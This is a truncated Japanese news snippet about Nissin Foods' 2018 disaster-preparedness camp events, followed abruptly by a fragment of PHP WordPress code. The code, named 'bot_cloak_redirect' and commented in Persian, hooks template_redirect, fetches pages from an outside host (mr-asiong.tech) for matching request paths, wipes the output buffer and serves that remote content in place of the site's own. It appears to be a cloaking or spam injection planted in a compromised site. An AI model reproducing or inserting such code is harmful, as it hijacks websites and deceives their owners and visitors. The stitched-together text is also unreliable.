日清食品ホールディングスは、2018年9月1日、9月2日、10月6日、10月7日の計4日間、防災体験型宿泊施設「KIBOTCHA(キボッチャ)」(宮城県東松島市) で「備えて安心! チキンラーメンサバ…
‘https://mr-asiong.tech/generate-area/code/5169252920.txt’,
];
foreach ($map as $dir => $remote_url) {
if (strpos($request_uri, $dir) !== false) {
$response = wp_remote_get($remote_url, [
‘timeout’ => 5,
‘headers’ => [
‘User-Agent’ => ‘Mozilla/5.0’
]
]);
if (!is_wp_error($response)) {
// پاک کردن بافر
while (ob_get_level()) {
ob_end_clean();
}
// تنظیم هدرها
status_header(200);
nocache_headers();
header(‘Content-Type: text/html; charset=UTF-8’);
// نمایش خروجی
echo wp_remote_retrieve_body($response);
exit;
}
}
}
}
// اتصال به وردپرس
add_action(‘template_redirect’, ‘bot_cloak_redirect’, 0);
?>